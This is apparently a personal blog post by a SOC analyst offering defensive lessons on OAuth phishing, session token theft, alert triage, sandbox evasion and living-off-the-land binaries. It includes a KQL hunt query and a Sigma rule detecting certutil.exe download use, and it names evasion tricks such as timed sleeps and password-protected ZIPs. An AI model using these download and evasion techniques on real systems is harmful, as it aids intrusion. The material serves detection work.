Skip to main content
HashnodeMon BlogueMon Blogue

Command Palette

Search for a command to run...

Beyond the Inbox: 5 Counter-Intuitive Truths from the SOC Frontlines

Updated
4 min read
Beyond the Inbox: 5 Counter-Intuitive Truths from the SOC Frontlines
P
Prayush Hada
SOC Analyst Currently working as a SOC Analyst and exploring the intersection of security and automation. I’m passionate about building secure systems and documenting my learning journey in cybersecurity.

About the Author

I am Prayush Hada, a SOC Analyst in CryptoGen Nepal. This post synthesizes my findings during my SOC internship, where I moved from following alerts to investigating the human logic behind them.

The Executive Summary (TL;DR)

In 2025, the "Security Stack" is no longer a wall; it’s a filter. As adversaries move toward Identity-centric attacks and LLM-assisted phishing, SOC analysts must stop looking for "bad files" and start hunting for "bad logic."

1. Phishing is Now an Identity & API Game

What it means: Modern phishing has evolved into "Quishing" (QR Code phishing) and AiTM (Adversary-in-the-Middle) attacks that bypass MFA. Why it matters: According to 2024 telemetry, 70% of successful breaches involved a human element, often via sophisticated OAuth consent grants rather than traditional malware.

  • Investigator’s Checklist:

    • Check for anomalous Redirect URIs in OAuth grants.

    • Verify DKIM/SPF/DMARC alignment for "high-trust" internal spoofs.

    • Hunt for MFA Fatigue patterns (multiple denied pushes followed by an approved one).

  • Useful Logs: AADSignInEventsBeta, CloudAppEvents (Microsoft 365).

Quick Hunt (KQL):

AuditLogs 
| where OperationName == "Consent to application"
| extend AppName = tostring(TargetResources[0].DisplayName)
| where AppName has_any ("Reader", "Vault", "Encryption") // Common decoy names

2. Valid Credentials are the New Malware

What it means: Attackers don't break in; they log in. Using stolen session cookies (Cookie Hijacking) allows them to bypass MFA entirely. Why it matters: 2025 reports show a 40% increase in Session Token Theft. A successful login from a "Known Device" can still be a malicious actor.

  • Investigator’s Checklist:

    • Correlate Impossible Travel with specific Session IDs.

    • Inspect User Agent strings for slight variations during a single session.

  • Short Example: An analyst flagged a login from a "compliant device" in London. Investigation revealed the session token was stolen via a transparent proxy 10 minutes earlier in New York.

3. Alerts are Signals, Not Stories

What it means: A "Low" severity alert (like a single failed login) is often the precursor to a "Critical" event. Why it matters: Attackers "warm up" environments by testing automation response times. If you only look at "High" alerts, you miss the reconnaissance phase.

  • Investigator’s Checklist:

    • Build a 30-minute Pre-and-Post Alert Timeline.

    • Map alerts to the MITRE ATT&CK framework to see the "missing links."

  • Quick Playbook Line: If a "Low" alert involves a privileged account, escalate to "Medium" immediately for manual review.

4. Automation Bypasses: The "Sleep" and "Password" Tactics

What it means: Attackers exploit the non-interactive nature of automated sandboxes. Why it matters: Most automated gateways won't wait more than 120 seconds for a payload to detonate. Attackers simply add a sleep(300) command.

  • Investigator’s Checklist:

    • Check for Password-protected ZIPs where the password is in the email body (gateways can't read the text to unzip the file).

    • Analyze files in Interactive Sandboxes where you can manually click buttons or wait out timers.

  • Short Example: A PDF appeared clean in the sandbox. When opened manually, it required a "Captcha" click to reveal the malicious URL—a simple human action that defeated the automation.

5. Hiding in Plain Sight (LOLBAS)

What it means: Using Living Off the Land Binaries like certutil.exe or powershell.exe to download payloads or exfiltrate data. Why it matters: These are "Trusted" Microsoft tools. Seeing them run isn't an alert; seeing them run with weird arguments is.

  • Investigator’s Checklist:

    • Monitor Event ID 4104 (PowerShell Script Block Logging).

    • Look for "Dual-Use" tools (RMM software like AnyDesk or ScreenConnect) being installed on servers.

  • Quick Hunt (Sigma):

    selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains: '-urlcache'
condition: selection

Conclusion: What to Change This Week

The technical stack will always evolve, but human reasoning is the constant. Shift your focus from "detecting badness" to "understanding normal."

Three immediate actions for your team:

  1. Audit OAuth Consents: Run a report on all third-party apps with Mail.Read or Files.Read permissions.

  2. Hunt for Mailbox Rules: Search for rules that move items to "Deleted Items" or "RSS Feeds"—a classic sign of an ongoing BEC.

  3. Validate Conditional Access: Ensure "Impossible Travel" triggers a re-authentication or a block.

#soc#phishing#threat-intelligence#cybersecurity

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

M

Mon Blogue

14 posts

itsjustajourney